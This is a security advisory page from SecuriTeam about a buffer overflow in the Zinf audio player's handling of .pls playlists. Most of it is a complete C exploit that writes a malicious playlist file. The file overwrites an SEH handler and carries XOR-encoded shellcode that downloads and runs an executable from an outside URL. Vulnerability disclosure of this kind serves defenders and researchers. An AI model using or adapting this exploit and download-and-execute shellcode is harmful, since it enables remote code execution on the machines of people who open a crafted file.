SecuriTeam - Zinf PLS Buffer Overflow

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

In short, Zinf is an audio player for Linux and Windows. The program is vulnerable to a buffer overflow bug in the way it handles playlists (".pls").

Credit:
The information has been provided by Luigi Auriemma.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Znif for Windows version 2.2.1 and prior
* Znif Linux version 2.2.4 and prior

Immune Systems:
* Znif Linux version 2.2.5

Exploit:
/*
this exploit generates a file exploit.pls which overflows a seh handler
jumps into a service pack independent address then it downloads and executes a file

  you can also download this exploit i a rar file(www.delikon.de).
  in this rar file you will find some screenshots, from OllyDbg
  which is maybe useful for beginners
*/

#include <stdio.h>
#include <windows.h>

#define SIZE 4048

char shellcode[] = "\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";

int main(){

char buffer[SIZE];
char exploit[]="exploit.pls";
char head[]="[playlist]File1=";
int i=0;
ULONG bytes=0;
char *pointer=NULL;
//for the decoder
short int weblength=0xff22;

ULONG RetAddr=0x10404DC4;
/*
SERVICE PACK independent
httpinput.pmi
10404DC4 5D POP EBP
10404DC5 B8 18000000 MOV EAX,18
10404DCA 5B POP EBX
10404DCB C2 0800 RETN 8
*/
//jump into nops
DWORD jump=0x909025eb;
HANDLE file=NULL;

//this is a small messageBox app
char web[]="http://www.delikon.de/klein.exe";

printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
printf("Coded by Delikon|www.delikon.de|27.9.04\n");
printf("all credits goes to Luigi Auriemma\n");
printf("\n [+] generate exploit.pls\n");

memset(buffer,0x00,SIZE-1);

file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

if(file == (HANDLE)0xffffffff){

printf("\t[+] error opening the file\n");
printf("PRESS A KEY\n");
getchar();
return -1;

}
strcpy(buffer,head);

memset(buffer+strlen(buffer),0x61,17);
//nops
memset(buffer+strlen(buffer),0x90,20);
//
strcat(buffer,shellcode);
//search for the shellcode length
pointer=strstr(buffer,"\x22\xff");
//weblength[0]-=strlen(web)+1;
weblength-=strlen(web)+1;
//increase it
memcpy(pointer,&weblength,2);

//copy the url in the buffer
strcat(buffer,web);

//xor the url with 0x1d
while(*(buffer+strlen(buffer)-strlen(web)+i)){

  *(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
  i++;
}

*(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

//copy the filling
memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
//also filling ;)
memcpy(buffer+strlen(buffer),&RetAddr,4);

memset(buffer+strlen(buffer),0x41,4);
memset(buffer+strlen(buffer),0x42,4);

//jump 24 bytes forward
memcpy(buffer+strlen(buffer),&jump,4);
//jump into pop reg pop reg ret
memcpy(buffer+strlen(buffer),&RetAddr,4);
memset(buffer+strlen(buffer),0x45,4);
memset(buffer+strlen(buffer),0x46,4);
memset(buffer+strlen(buffer),0x47,4);

WriteFile(file,buffer,strlen(buffer),&bytes,0);

CloseHandle(file);
printf("\n [+] ready press a key\n");
getchar();

exit(1);

}

blog comments powered by Disqus

	HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty
	InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy
	InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability
	HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty
	GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability
	HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty
	Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit
	Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability
	Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability
	Apple QuickTime FLC Delta Decompression Code Execution Vulnerability
	Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability